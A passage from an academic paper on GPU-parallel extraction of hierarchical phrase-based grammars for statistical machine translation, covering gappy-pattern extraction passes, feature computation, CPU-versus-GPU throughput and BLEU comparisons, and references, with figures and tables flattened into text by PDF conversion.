enumerated in pass 5, we scan T from position j + |v| + 1 for matches of w until we reach the end of sentence. As with the one-gap patterns, we apply the extraction check on the second ? of the two-gap patterns u ? v ? w to avoid needlessly materializing matches that will not yield translations. 2.3 Extracting Every Target Phrase In line 5 of Algorithm 1 we must extract the aligned translation of every match of every pattern found in T . Efficiency is crucial since some patterns may occur hundreds of thousands of times. We extract translations from word alignments using the consistency check of Och et al. (1999). A pair of substrings is consistent only if no word in either substring is aligned to any word outside the pair. For example, in Figure 2 the pair (it sets him on, los excita) is consistent. The pair (him on and, los excita y) is not, because excita also aligns to the words it sets. Only consistent pairs can be 90 lo s ex ci ta y lo s pa ra li za L R P # 9 7 it 10 2 2 1 sets 11 2 2 2 him 12 1 1 3 on 13 2 2 4 and 14 3 3 5 it 15 5 5 6 takes 16 5 5 7 him 17 4 4 8 off 18 5 5 9 8 9 10 11 12 L′ 3 1 5 8 6 R′ 3 4 5 8 9 Figure 2: An example alignment and the corre- sponding L, R, P , L′ and R′ arrays. translations of each other in our model. Given a specific source substring, our algorithm asks: is it part of a consistent pair? To answer this question, we first compute the minimum target substring to which all words in the substring align. We then compute the minimum substring to which all words of this candidate translation align. If this substring matches the input, the candidate transla- tion is returned; otherwise, extraction fails. For example, it sets him on in range (10, 13) aligns to los excita in range (8, 9), which aligns back to (10, 13). So this is a consistent pair. However, him on and in range (12, 14) aligns to los excita y in range (8, 10), which aligns back to it sets him on and at (10, 14). So him on and is not part of a consistent pair and has no extractable translation. To extract gappy translation units, we subtract consistent pairs from other consistent pairs (Chiang, 2007). For example, (him, los) is a consistent pair. Subtracting it from (it sets him on, los excita) yields the translation unit (it sets ? on, ? excita). Our basic building block is the EXTRACT func- tion of He et al. (2013), which performs the above check using byte arrays denoted L, R, P , L′, and R′ (Figure 2) to identify extractable target phrases in target text T ′. When T[i] is a word, L[i] and R[i] store the sentence-relative positions of the leftmost and rightmost words it aligns to in T ′, and P[i] stores T[i]’s sentence-relative position. When T[i] is a sentence boundary, the concatenation of bytes L[i], R[i], and P [i], denoted LRP[i], stores the position of the corresponding sentence in T ′. Bytes L′[i′] and R′[i′] store the sentence-relative positions of the leftmost and rightmost words T ′[i′] aligns to. We first calculate the start position p of the source sentence containing T[i]...T[j], and the start posi- tion p′ of the corresponding target sentence: p = i−P [i] p′ = LRP[p] We then find target indices i′ and j′ for the candidate translation T ′[i′]...T ′[j′]: i′ = p′ + min k∈i,...,j L[k] j′ = p′ + max k∈i,...,j R[k] We can similarly find the translation T[i′′]...T[j′′] of T ′[i′]...T ′[j′]: i′′ = p + min k′∈i′,...,j′ L′[k′] j′′ = p + max k′∈i′,...,j′ R′[k′] If i = i′′ and j = j′′, EXTRACT(i,j) returns (i′,j′), the position of T[i]...T[j]’s translation. Otherwise the function signals that there is no extractable translation. Given this function, extraction proceeds in three passes. Pass 8: Extracting contiguous patterns Each match of pattern u is assigned to a concurrent thread. The thread receiving the match at position i returns the pair consisting of u and its translation according to EXTRACT(i, i + |u| − 1), if any. It also returns translations for patterns in which u is the only contiguous subpattern: ? u, u ?, and ? u ?. We extract translations for these patterns even if u has no translation itself. To see why, suppose that we reverse the translation direction of our example. In Figure 2, excita is not part of a consistent pair, but both ? excita and ? excita ? are. Consider ? u. Since ? matches any substring in T without boundary symbols, the leftmost position of 91 ? u is not fixed. So, we seek the smallest match with an extractable translation, returning its translation with the following algorithm. 1: k ← i 2: while T[k − 1] 6= # do 3: k ← k − 1 4: if EXTRACT(k,i + |u|− 1) succeeds then 5: (i′,j′) ← EXTRACT(k,i + |u|− 1) 6: if EXTRACT(k,i− 1) succeeds then 7: (p′,q′) ← EXTRACT(k,i− 1) 8: return T ′[i′]...T ′[p′] ? T ′[q′]...T ′[j′] 9: if T[k − 1] = # then 10: return failure The case of u ? is symmetric. We extend this algorithm to handle ? u ?. The extension considers increasingly distant pairs (k,`) for which ? u ? matches T[k]...T[`], until it either finds an extractable translation, or it encounters both sentence boundaries and fails. Pass 9: Extracting one-gap patterns (New) In this pass, each match of pattern u ? v is assigned to a thread. The thread receiving match (i,j) attempts to assign i′,j′,p′ and q′ as follows. (i′,j′) = EXTRACT(i,j + |v|− 1) (p′,q′) = EXTRACT(i + |u|,j − 1) If both calls succeed, we subtract to obtain the translation T ′[i′]...T ′[p′] ?T ′[q′]...T ′[j′]. We extract translations for ? u ? v and u ? v ?, using the same algorithm as in pass 7. Pass 10: Extracting two-gap patterns (New) In this pass, we extract a translation for each match of u ? v ? w concurrently, using a straightforward extension of the subtraction algorithm in pass 8. Since we only need patterns with up to two gaps, we do not consider other patterns. To optimize GPU performance, for the passes above, we assign all matches of a gappy pattern to the same thread block. This allows threads in the same thread block to share the same data during initialization, therefore improving memory access coherence. 2.4 Computing Every Feature In line 7 of Algorithm 1 we compute features of every extracted phrase pair. We use α and β to denote arbitrary strings of words and ? symbols, and our input is a multiset of (α,β) pairs collected by passes 7-9, which we denote by Π. We compute the following features for each unique (α,β) pair. Log-count features. We need two aggregate statis- tics: The count of (α,β) in Π, and the count of all pairs in Π for which α is the source pattern. We then compute the two features as log(1 + count(α,β)) and log(1 + count(α)). Translation log-probability. Given the aggregate counts above, this feature is log count(α,β)count(α) . Singleton indicators. We compute two features, to indicate whether (α,β) occurs only once, i.e., count(α,β) = 1, and whether α occurs only once, i.e., count(α) = 1. Lexical weight. Consider word pairs a,b with a ∈ α, b ∈ β, and neither a nor b are ?. Given a global word translation probability table p(a|b), which is exter- nally computed from the word alignments directly, the feature is ∑ a∈α maxb∈β log p(a|b). Since Π is the result of parallel computation, we must sort it. We can then compute aggregate statis- tics by keeping running totals in a scan of the sorted multiset. With many instantiated patterns, we would quickly exhaust GPU memory, so this sort is performed on the CPU. We compute the log-count features, translation log-probability, and singleton indicators this way. However, the lexical weight feature is a function only of the aligned translation pair itself and corresponding word-level translation possibilities calculated externally from word alignment. Thus, the computation of this feature can be parallelized on the GPU. So, we have multiple feature extraction passes based on the number of gaps: Pass 11 (CPU): One-gap features (New). Pass 12 (CPU): Two-gap features (New). Pass 13 (CPU): Contiguous features. Pass 14 (GPU): Lexical weight feature (New). 2.5 Sampling In serial implementations of on-demand extraction, very frequent patterns are a major computational bottleneck (Callison-Burch et al., 2005; Lopez, 2008b). Thus, for patterns occurring more than n times, for some fixed n (typically 92 between 100 and 1000), these implementations deterministically sample n matches, and only extract translations of these matches. To compare with these implementations, we also implement an optional sampling step. Though we use the same sampling rate, the samples themselves are not the same, since our extraction checks in passes 4 and 6 alter the set of matches that are actually enumerated, thus sampled from. The CPU algorithms do not use this check. 3 Experimental Setup We tested our algorithms in an end-to-end Chinese- English translation task using data conditions simi- lar to those of Lopez (2008b) and He et al. (2013). Our implementation of hierarchical grammar extrac- tion on the GPU, as detailed in the previous section, is written in C, using CUDA library v5.5 and GCC v4.8, compiled with the -O3 optimization flag. Our code is open source and available for researchers to download and try out.1 Hardware. We used NVIDIA’s Tesla K20c GPU (Kepler Generation), which has 2496 CUDA cores and 5 GB memory, with a peak memory bandwidth of 208 GB/s. The server hosting the GPU has two Intel Xeon E5-2690 CPUs, each with eight cores at 2.90 GHz (a total of 16 physical cores; 32 logical cores with hyperthreading). Both were released in 2012 and represent comparable generation hardware technology. All GPU and CPU experiments were conducted on the same machine, which runs Red Hat Enterprise Linux (RHEL) 6. Training Data. We used two training sets: The first consists of news articles from the Xinhua Agency, with 27 million words of Chinese (around one mil- lion sentences). The second adds parallel text from the United Nations, with 81 million words of Chi- nese (around four million sentences). Test Data. For performance evaluations, we ran tests on sentence batches of varying sizes: 100, 500, 1k, 2k, 4k, 6k, 8k, 16k and 32k. These sentences are drawn from the NIST 2002–2008 MT evaluations (on average 27 words each) and then the Chinese side of the Hong Kong Parallel Text (LDC2004T08) when the NIST data are smaller than the target batch 1http://hohocode.github.io/cgx/ size. Large batch sizes are necessary to saturate the processing power of the GPU. The size of the complete batch of 32k test sentences is 4892 KB. Baselines. We compared our GPU implementa- tion for on-demand extraction of hierarchical gram- mars against the corresponding CPU implementa- tion (Lopez, 2008a) found in pycdec (Chahuneau et al., 2012), an extension of cdec (Dyer et al., 2010).2 We also compared our GPU algorithms against Moses (Koehn et al., 2007), representing a standard phrase-based SMT baseline. Phrase tables generated by Moses are essentially the same as the GPU implementation of on-demand extraction for phrase-based translation by He et al. (2013). 4 Results 4.1 Translation quality We first verified that our GPU implementation achieves the same translation quality as the corresponding CPU baseline. This is accomplished by comparing system output against the baseline systems, training on Xinhua, tuning on NIST03, and testing on NIST05. In all cases, we used MIRA (Chiang, 2012) to tune parameters. We ran experiments three times and report the average as recommended by Clark et al. (2011). Hierarchical grammars were extracted with sampling at a rate of 300; we also bound source patterns at a length of 5 and matches at a length of 15. For Moses we used default parameters. Our BLEU scores, shown in Table 1, replicate well-known results where hierarchical models out- perform pure phrase-based models on this task. The difference in quality is partly because the phrase- based baseline system does not use lexicalized re- ordering, which provides similar improvements to hierarchical translation (Lopez, 2008b). Such lex- icalized reordering models cannot be produced by the GPU-based system of He et al. (2013). This establishes a clear translation quality improvement between our work and that of He et al. (2013). 2The Chahuneau et al. (2012) implementation is in Cython, a language for building Python applications with performance- critical components in C. All of the pattern matching code that we instrumented for these experiments is compiled to C/C++. The implementation is a port of the original code written by Lopez (2008a) in Pyrex, a precursor to Cython. Much of the code is unchanged. 93 http://hohocode.github.io/cgx/ System BLEU Moses phrase-based baseline 31.11 Hierarchical with online CPU extraction 33.37 Hierarchical with online GPU extraction 33.46 Table 1: Comparison of translation quality. The hierarchical system is cdec. Online CPU extraction is the baseline, part of the standard cdec package. Online GPU extraction is this work. We see that the BLEU score obtained by our GPU implementation of hierarchical grammar extraction is nearly identical to cdec’s, evidence that our im- plementation is correct. The minor differences in score are due to non-determinism in tuning and the difference in sampling algorithms (§2.5). 4.2 Extraction Speed Next, we focus on the performance of the hierar- chical grammar extraction component, comparing the CPU and GPU implementations. For both implementations, our timings include preparation of queries, pattern matching, extraction, and feature computation. For the GPU implementation, we include the time required to move data to and from the GPU. We do not include time for construction of static data structures (suffix arrays and indexes) and initial loading of the parallel corpus with alignment data, as those represent one-time costs. Note that the CPU implementation includes indexes for frequent patterns in the form u ? v and u ? v ? w, while our GPU implementation indexes only the former. We compared performance varying the number of queries, and following Lopez (2008a), we compared sampling at a rate of 300 against runs without sam- pling. Our primary evaluation metric is throughput: the average number of processed words per second (i.e., batch size in words divided by total time). We first establish throughput baselines on the CPU, shown in Table 2. Experiments used different numbers of threads under different data conditions (Xinhua or Xinhua + UN), with and without sam- pling. Our server has a total of 16 physical cores, but supports 32 logical cores via hyperthreading. We obtained the CPU sampling results by running cdec over 16k query sentences. For the non-sampling runs, since the throughput is so low, we measured +Sampling −Sampling threads X X+U X X+U 1 12.7 4.8 0.32 0.05 16 190.7 65.3 4.81 0.70 32 248.1 76.0 6.23 0.89 Table 2: CPU extraction performance (throughput in words/second) using different numbers of threads under different data conditions (X: Xinhua, X+U: Xinhua+UN), with and without sampling. performance over 2.6k sentences for Xinhua and 500 sentences for Xinhua + UN. We see that throughput scaling is slightly less than linear: with sampling, using 16 threads increases throughput by 15× on the Xinhua data (compared to a single thread) and 13.6× on Xinhua + UN data. Going from 16 to 32 threads further increase throughput by 15%- 30% and saturates the processing capacity of our server. The 32 thread condition provides a fair baseline for comparing the performance of the GPU implementation. Table 3 shows GPU hierarchical grammar extraction performance in terms of throughput (words/second); these results are averaged over three trials. We varied the number of query sentences, and in each case, also report the speedup with respect to the CPU condition with 32 threads. GPU throughput increases with larger batch sizes because we are increasingly able to saturate the GPU and take full advantage of the massive parallelism it offers. We do not observe this effect on the CPU since we saturate the processors early. With a batch size of 100 sentences, the GPU is slightly slower than the 32-thread CPU imple- mentation on Xinhua and faster on Xinhua + UN, both with sampling. Without sampling, the GPU is already an order of magnitude faster at a batch size of 100 sentences. At a batch size of 500 sentences, the GPU implementation is substantially faster than the 32-thread CPU version across all conditions. With the largest batch size in our exper- iments of 32k sentences, the GPU is over an order of magnitude faster than the fully-saturated CPU with sampling, and over two orders of magnitude faster without sampling. Although previous work does not show decreased translation quality due 94 Batch Size Number of Sentences 100 500 1k 2k 4k 6k 8k 16k 32k Number of Tokens 2.8k 14.5k 28.8k 57.9k 117.9k 161.9k 214.2k 436.5k 893.9k + S am pl in g Xinhua Throughput (words/s) 236 667 914 1356 1613 1794 2001 2793 3998 Speedup 1.0× 2.7× 3.7× 5.5× 6.5× 7.2× 8.1× 11.3× 16.1× Xinhua+UN Throughput (words/s) 106 223 287 400 454 514 571 709 1016 Speedup 1.4× 2.9× 3.8× 5.3× 6.0× 6.8× 7.5× 9.3× 13.4× − S am pl in g Xinhua Throughput (words/s) 84 280 405 690 929 1200 1414 2135 3240 Speedup 13× 45× 65× 111× 149× 193× 227× 343× 520× Xinhua+UN Throughput (words/s) 19 62 99 172 248 304 357 509 793 Speedup 22× 69× 112× 193× 279× 342× 401× 572× 891× Table 3: GPU grammar extraction throughput (words/second) under different batch sizes, data conditions, with and without sampling. Speedup is computed with respect to the CPU baseline running on 32 threads. +Sampling −Sampling X X+U X X+U GPU one-by-one 7.23 4.7 2.39 0.71 CPU single-thread 12.7 4.8 0.32 0.05 Table 4: Sentence-by-sentence GPU grammar extraction throughput (words/second) vs. a single thread on the CPU (X: Xinhua, X+U: Xinhua + UN). to sampling (Callison-Burch et al., 2005; Lopez, 2008b), these results illustrate the raw computa- tional potential of GPUs, showing that we can elim- inate heuristics that make CPU processing tractable. We believe future work can exploit these untapped processing cycles to improve translation quality. How does the GPU fare for translation tasks that demand low latency, such as sentence-by-sentence translation on the web? To find out, we conducted experiments where the sentences are fed, one by one, to the GPU grammar extraction algorithm. Results are shown in Table 4, with a comparison to a single- threaded CPU baseline. To be consistent with the other results, we also measure speed in terms of throughput here. Note that we are not aware of any freely available multi-threaded CPU algorithm to process an individual sentence in parallel, so the single-thread CPU comparison is reasonable.3 We observe that the GPU is slower only with sam- pling on the smaller Xinhua data. In all other 3Parallel sub-sentential parsing has been known for many years (Chandwani et al., 1992) although we don’t know of an implementation in any major open-source MT systems. Queries 2k 4k 6k 8k GPU PBMT 15s 25s 29s 33s GPU Hiero 43s 73s 90s 107s Slowdown 2.8× 2.9× 3.1× 3.2× Table 5: Grammar extraction time comparing this work (GPU Hiero) and the work of He et al. (2013) (GPU PBMT). cases, sentence-by-sentence processing on the GPU achieves a similar level of performance or is faster. Next, we compare the performance of hierarchical grammar extraction to phrase-based extraction on the GPU with sampling. We replicated the test data condition of He et al. (2013) so that our first 8k query sentences are the same as those used in their exper- iments. The results are shown in Table 5, where we report grammar extraction time for batches of different sizes; the bottom row shows the slowdown of the hierarchical vs. non-hierarchical grammar conditions. This quantifies the performance penalty to achieve the translation quality gains reported in Table 1. Hierarchical grammar extraction is about three times slower, primarily due to the computa- tional costs of the new passes presented in §2. Another aspect of performance is memory foot- print. We report the memory use (CPU RAM) of all four conditions in Table 6. The values reported for the CPU implementation use a single thread only. At runtime, our hierarchical GPU system exhibits peak CPU memory use of 8 GB on the host machine. Most of this memory is consumed by batching ex- 95 CPU GPU PBMT 1.6 GB 2.3 GB Hiero 1.9 GB 8.0 GB Table 6: Memory consumption (CPU RAM) for different experimental conditions. tracted phrases before scoring in passes 10 through 14. Since the phrase-based GPU implementation processes far fewer phrases, the memory footprint is much smaller. The CPU implementations pro- cess extracted phrases in small batches grouped by source phrase, and thus exhibit less memory usage. However, these levels of memory consumption are modest considering modern hardware. In all other respects, memory usage is similar for all systems, since the suffix array and associated data structures are all linear in the size of the indexed parallel text. 4.3 Per-Pass Speed To obtain a detailed picture of where the GPU speedups and bottlenecks are, we collected per-pass timing statistics. Table 7 shows results for grammar extraction on 6k queries using the Xinhua data with no sampling and default length constraints (passes in gray occur on the GPU; all others on the CPU). These numbers explain the decreased speed of hi- erarchical extraction compared to He et al. (2013), with the new passes (shown in italics) accounting for more than 75% of the total computation time. However, even passes that are nominally the same actually require more time in the hierarchical case: in extracting and scoring phrases associated with a contiguous pattern u, we must now also extract and score patterns ? u, u ?, and ? u ?. Interestingly, the CPU portions of our algorithm account for around half of the total grammar ex- traction time. One way to interpret this observation is that the massive parallelization provided by the GPU is so effective that we are bottlenecked by the CPU. In our current design, the CPU portions are those that cannot be easily parallelized on the GPU or those that require too much memory to fit on the GPU. The former is a possible target for optimization in future work, though the latter will likely be solved by hardware advances alone: for example, the Tesla K80 has 24 GB of memory. Pass Time % Contig. pattern pass 1 0.03 0.02% Contig. pattern pass 2 0.02 0.02% One-gap pattern generation 1.14 0.86% One-gap pattern matching 19.24 14.54% Two-gap pattern generation 0.37 0.28% Two-gap pattern matching 15.91 12.02% Gappy pattern processing 1.21 0.91% Contig. pattern extraction 13.94 10.53% Two-gap pattern extraction 0.52 0.39% One-gap pattern extraction 11.07 8.36% One gap translation features 23.72 17.91% Two gap translation features 30.90 23.34% Contig. translation features 5.00 3.77% Lexical weight feature 3.09 2.33% Data transfer and control 6.23 4.71% Total 132.39 100.0% Table 7: Detailed timings (in seconds) for 6k queries. Passes in gray occur on the GPU; all others on the CPU. Passes needed for hierarchical grammars are in italics, which are not present in He et al. (2013). 4.4 End-to-end Speed What is the benefit of using GPUs in an end-to- end translation task? Since we have shown that both the CPU and GPU implementations achieve near-identical translation quality, the difference lies in speed. But speed is difficult to measure fairly: translation involves not only grammar extraction but also decoding and associated I/O. We have focused on grammar extraction on the GPU, but our research vision involves eventually moving all components of the machine translation pipeline onto the GPU. The experiments we describe below capture the performance advantages of our implementation that are achievable today, using cdec for decoding (on the CPU, using 32 threads). To measure end-to-end translation speed using pycdec, per-sentence grammars are first extracted for a batch of sentences and written to disk, then read from disk during decoding. Therefore, we report times separately for grammar extraction, disk I/O, and decoding (which includes time for reading the grammar files from disk back into memory). Grammar extraction is either performed on the GPU 96 Grammar Extraction Disk I/O Decoding GPU: 30.8s 13.4s CPU: 59s CPU: 101.1s Table 8: Running times for an end-to-end translation pipeline over NIST03 test data. Grammar extraction is either performed on the GPU or the CPU (32 threads); other stages are the same for both conditions (decoding uses 32 threads). or on the CPU (using 32 threads), same as the experiments described in the previous section. Results are shown in Table 8 using the Xinhua training data and NIST03 test data (919 sentences, 27,045 words). All experiment settings are ex- actly the same as in the previous section. We observe an end-to-end translation throughput of 262 words/second with GPU grammar extraction and 156 words/second on the CPU (32 threads), for a speedup of 1.68×. Despite the speedup, we note that this experiment favors the CPU for several reasons. First, the GPU is idle during decoding, but it could be used to process grammars for a subsequent batch of sentences in a pipelined fashion. Second, NIST03 is a small batch that doesn’t fully saturate the GPU—throughput keeps increasing by a large margin with larger batch sizes (see results in Table 3). Third, in comparison to the 32-thread CPU baseline, our GPU extraction only uses a single thread on the CPU throughout its execution, thus the CPU portion of the performance can be further improved, especially in the feature generation passes (see §4.3 for details). Of course, the GPU/CPU combination requires a server equipped with a GPU, incurring additional hardware costs. We estimate that in Q4 2014 dollars, our base system would cost roughly $7500 USD, and the GPU would cost another $2600 USD. However, the server-grade GPU used in this work is not the only choice: a typical high-end consumer GPU, such as the NVIDIA GTX Titan Black (around $1100), costs considerably less but has even higher memory bandwidth and with similarly impressive floating point performance. This price difference is due to extra functionalities (e.g., error-correcting code memory) for specific applications (e.g., sci- entific computing), and is not directly related to differences in raw computational power. This means that we could speed up overall translation by 68% if we spend an additional 35% (server-grade GPU) or 15% (consumer-grade GPU) on hardware. From an economic perspective, this is an attractive proposi- tion. Of course, the advantages of using GPUs for high-throughput translation go up further with larger batch sizes. 4.5 One-time Construction Costs Construction of static data structures for on-demand grammar extraction is a one-time cost given a corpus T . However, under a streaming scenario where we might receive incremental changes to T as new training data become available, we need to update the data structures appropriately. Updating static data structures involves two costs: the suffix array with its LCP array and the precom- putation indexes. We do not consider the alignment construction cost as it is external to cdec (and is a necessary step for all implementations). For the Xinhua data, building the suffix array using a single CPU thread takes 29.2 seconds and building the precomputation indexes on the GPU takes 5.7 seconds. Compared to Table 7, these one-time costs represent approximately 27% of the GPU grammar extraction time. It is possible to lower the construction costs of these data structures given recent advances. Lev- enberg et al. (2010) describe novel algorithms that allow efficient in-place updates of the suffix array when new training data arrive. That work directly tackles on-demand SMT architectures in the stream- ing data scenario. Alternatively, the speed of suffix array construction can be improved significantly by the CUDA Data Parallel Primitives Library,4 which provides fast sorting algorithms to efficiently construct suffix arrays on the GPU. Minimizing data preparation costs has not been a focus of this work, but we believe that the massive parallelism provided by the GPU represents promising future work. 5 Conclusions and Future Work The increasing demands for translation services be- cause of globalization (Pangeanic, 2013; Sykes, 2009) make high-throughput translation a realistic 4http://cudpp.github.io/cudpp/2.2/ 97 http://cudpp.github.io/cudpp/2.2/ scenario, and one that our GPU implementation is highly suited to serve. High-throughput translation also enables downstream applications such as doc- ument translation in cross-language information re- trieval (Oard and Hackett, 1997), where we translate the entire source document collection into the target language prior to indexing. The number of transistors on a chip continues to increase exponentially, a trend that even pessimists concede should continue at least until the end of the decade (Vardi, 2014). Computer architects widely agree that instruction-level hardware parallelism is long past the point of diminishing returns (Olukotun and Hammond, 2005). This has led to a trend of placing greater numbers of cores on the same die. The question is how to best utilize the transistor budget: a small number of complex cores, a large number of simple cores, or a mixture of both? For our problem, it appears that we can take advantage of brute force scans and fine-grained parallelism inherent in the problem of on-demand extraction, which makes investments in large numbers of simple cores (as on the GPU) a win. This observation is in line with trends in other ar- eas of computing. Many problems in computational biology, like computational linguistics, boil down to efficient search on discrete sequences of symbols. DNA sequence alignment systems MummerGPU (Schatz et al., 2007) and MummerGPU 2 (Trap- nell and Schatz, 2009) use suffix trees to perform DNA sequence matching on the GPU, while the state-of-the-art system MummurGPU++ (Gharaibeh and Ripeanu, 2010) uses suffix arrays, as we do here. Our algorithms for matching gappy patterns in passes 3 and 4 are closely related to seed-and-extend algorithms for approximate matching in DNA se- quences, which have recently been implemented on GPUs (Wilton et al., 2014). It is unlikely that CPU processing will become obsolete, since not all problems can be cast in a data- parallel framework. Ultimately, we need a hybrid architecture where parallelizable tasks are offloaded to the GPU, which works in conjunction with the CPU to handle irregular computations in a pipelined fashion. In a well-balanced system, both the GPU and the CPU would be fully utilized, performing the types of computation they excel at, unlike in our current design, where the GPU sits idle while the CPU finishes decoding. A part of our broad research agenda is exploring which aspects of the machine translation pipeline are amenable to GPU algorithms. The performance analysis in §4.3 shows that even in grammar extraction there are CPU bottlenecks we need to address and opportunities for further optimization. Beyond grammar extraction, there is a question about whether decoding can be moved to the GPU. Memory is a big hurdle: since accessing data struc- tures off-GPU is costly, it would be preferable to hold all models in GPU memory. We’ve addressed the problem for translation models, but the language models used in machine translation are also large. It might be possible to use lossy compression (Tal- bot and Osborne, 2007) or batch request strategies (Brants et al., 2007) to solve this problem. If we do, we believe that translation models could be decoded using variants of GPU algorithms for speech (Chong et al., 2009) or parsing (Yi et al., 2011; Canny et al., 2013; Hall et al., 2014), though the latter algorithms exploit properties of latent-variable grammars that may not extend to translation. Thinking beyond decoding, we believe that other problems in compu- tational linguistics might benefit from the massive parallelism offered by GPUs. Acknowledgments This research was supported in part by the BOLT program of the Defense Advanced Research Projects Agency, Contract No. HR0011-12-C-0015; NSF under award IIS-1218043; and the Human Language Technology Center of Excellence at Johns Hopkins University. Any opinions, findings, conclusions, or recommendations expressed in this paper are those of the authors and do not necessarily reflect views of the sponsors. The second author is grateful to Esther and Kiri for their loving support and dedicates this work to Joshua and Jacob. We thank Nikolay Bogoychev and the anonymous TACL re- viewers for helpful comments on previous drafts, Rich Cox for support and advice, and CLIP labmates (particularly Junhui Li and Wu Ke) for helpful discussions. We also thank UMIACS for providing hardware resources via the NVIDIA CUDA Center of Excellence, and the UMIACS IT staff, especially Joe Webster, for excellent support. 98 References Paul Baltescu and Phil Blunsom. 2014. A fast and simple online synchronous context free grammar extractor. The Prague Bulletin of Mathematical Linguistics, 102(1):17–26. Thorsten Brants, Ashok C. Popat, Peng Xu, Franz J. Och, and Jeffrey Dean. 2007. Large language models in machine translation. In Proceedings of the 2007 Joint Conference on Empirical Methods in Natural Language Processing and Computational Natural Language Learning (EMNLP-CoNLL 2007), pages 858–867. Chris Callison-Burch, Colin Bannard, and Josh Schroeder. 2005. Scaling phrase-based statistical machine translation to larger corpora and longer phrases. In Proceedings of the 43rd Annual Meeting on Association for Computational Linguistics (ACL 2005), pages 255–262. John Canny, David Hall, and Dan Klein. 2013. A multi-teraflop constituency parser using GPUs. In Proceedings of the 2013 Conference on Empirical Methods in Natural Language Processin (EMNLP 2013), pages 1898–1907. Victor Chahuneau, Noah A. Smith, and Chris Dyer. 2012. pycdec: A Python interface to cdec. In Proceedings of the 7th Machine Translation Marathon (MTM 2012). M. Chandwani, M. Puranik, and N. S. Chaudhari. 1992. On CKY-parsing of context-free grammars in parallel. In Proceedings of Technology Enabling Tomorrow: Computers, Communications and Automation towards the 21st Century, pages 141–145. David Chiang. 2007. Hierarchical phrase-based translation. Computational Linguistics, 33(2):201– 228. David Chiang. 2012. Hope and fear for discriminative training of statistical translation models. Journal of Machine Learning Research, 13:1159–1187. Jike Chong, Ekaterina Gonina, Youngmin Yi, and Kurt Keutzer. 2009. A fully data parallel WFST-based large vocabulary continuous speech recognition on a graphics processing unit. In Proceedings of the 10th Annual Conference of the International Speech Communication Association (INTERSPEECH 2009), pages 1183–1186. Jonathan H. Clark, Chris Dyer, Alon Lavie, and Noah A. Smith. 2011. Better hypothesis testing for statistical machine translation: Controlling for optimizer instability. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics (ACL 2011), pages 176–181. Chris Dyer, Adam Lopez, Juri Ganitkevitch, Johnathan Weese, Ferhan Ture, Phil Blunsom, Hendra Setiawan, Vladimir Eidelman, and Philip Resnik. 2010. cdec: A decoder, alignment, and learning framework for finite-state and context-free translation models. In Proceedings of the ACL 2010 System Demonstrations, pages 7–12. Michel Galley and Christopher D. Manning. 2010. Accurate non-hierarchical phrase-based translation. In Human Language Technologies: The 2010 Annual Conference of the North American Chapter of the As- sociation for Computational Linguistics (HLT/NAACL 2010), pages 966–974. Abdullah Gharaibeh and Matei Ripeanu. 2010. Size matters: Space/time tradeoffs to improve GPGPU applications performance. In Proceedings of the 2010 ACM/IEEE International Conference for High Performance Computing, Networking, Storage and Analysis (SC 2010), pages 1–12. Jesús González-Rubio, Daniel Ortiz-Martı́nez, and Francisco Casacuberta. 2012. Active learning for interactive machine translation. In Proceedings of the 13th Conference of the European Chapter of the Association for Computational Linguistics (EACL 2012), pages 245–254. David Hall, Taylor Berg-Kirkpatrick, and Dan Klein. 2014. Sparser, better, faster GPU parsing. In Proceed- ings of the 52nd Annual Meeting of the Association for Computational Linguistics (ACL 2014), pages 208– 217. Hua He, Jimmy Lin, and Adam Lopez. 2013. Massively parallel suffix array queries and on-demand phrase extraction for statistical machine translation using GPUs. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 325–334. Jared Hoberock and Nathan Bell. 2010. Thrust: A parallel template library. Version 1.8.0. Philipp Koehn, Hieu Hoang, Alexandra Birch, Chris Callison-Burch, Marcello Federico, Nicola Bertoldi, Brooke Cowan, Wade Shen, Christine Moran, Richard Zens, Chris Dyer, Ondřej Bojar, Alexandra Con- stantin, and Evan Herbst. 2007. Moses: Open source toolkit for statistical machine translation. In Proceedings of the 45th Annual Meeting of the ACL on Interactive Poster and Demonstration Sessions, pages 177–180. Abby Levenberg, Chris Callison-Burch, and Miles Osborne. 2010. Stream-based translation models for statistical machine translation. In Human Language Technologies: The 2010 Annual Conference of the North American Chapter of the Association for Computational Linguistics (HLT/NAACL 2010), pages 394–402. 99 Adam Lopez. 2007. Hierarchical phrase-based translation with suffix arrays. In Proceedings of the 2007 Joint Conference on Empirical Methods in Natural Language Processing and Computational Natural Language Learning (EMNLP-CoNLL 2007), pages 976–985. Adam Lopez. 2008a. Machine translation by pattern matching. Ph.D. dissertation, University of Maryland, College Park, Maryland, USA. Adam Lopez. 2008b. Tera-scale translation models via pattern matching. In Proceedings of the 22nd In- ternational Conference on Computational Linguistics (COLING 2008), pages 505–512. Udi Manber and Gene Myers. 1990. Suffix arrays: a new method for on-line string searches. In Proceedings of the First Annual ACM-SIAM Symposium on Discrete Algorithms (SODA ’90), pages 319–327. Douglas W. Oard and Paul Hackett. 1997. Document translation for cross-language text retrieval at the University of Maryland. In Proceedings of the 7th Text REtrieval Conference (TREC-7). Franz Josef Och, Christoph Tillmann, and Hermann Ney. 1999. Improved alignment models for statistical machine translation. In Proceedings of the 1999 Joint SIGDAT Conference on Empirical Methods in Natural Language Processing and Very Large Corpora (EMNLP 1999), pages 20–28. Kunle Olukotun and Lance Hammond. 2005. The future of microprocessors. ACM Queue, 3(7):27–34. Pangeanic, 2013. What is The Size of the Translation Industry? http://www.pangeanic.com/knowledge center/size-translation-industry/. Aaron B. Philips. 2012. Modeling Relevance in Statistical Machine Translation: Scoring Alignment, Context, and Annotations of Translation Instances. Ph.D. thesis, Carnegie Mellon University. Michael Schatz, Cole Trapnell, Arthur Delcher, and Amitabh Varshney. 2007. High-throughput sequence alignment using graphics processing units. BMC Bioinformatics, 8(1):474. Michel Simard, Nicola Cancedda, Bruno Cavestro, Marc Dymetman, Eric Gaussier, Cyril Goutte, and Kenji Yamada. 2005. Translating with non-contiguous phrases. In Proceedings of Human Language Technology Conference and Conference on Empirical Methods in Natural Language Processing (EMNLP 2005), pages 755–762. Patrick Simianer, Stefan Riezler, and Chris Dyer. 2012. Joint feature selection in distributed stochastic learning for large-scale discriminative training in SMT. In Proceedings of the 50th Annual Meeting of the Association for Computational Linguistics (ACL 2012), pages 11–21. Tanisha Sykes, 2009. Growth in Translation. http://www.inc.com/articles/2009/08/translation.html. David Talbot and Miles Osborne. 2007. Randomised language modelling for statistical machine translation. In Proceedings of the 45th Annual Meeting of the Association for Computational Linguistics (ACL 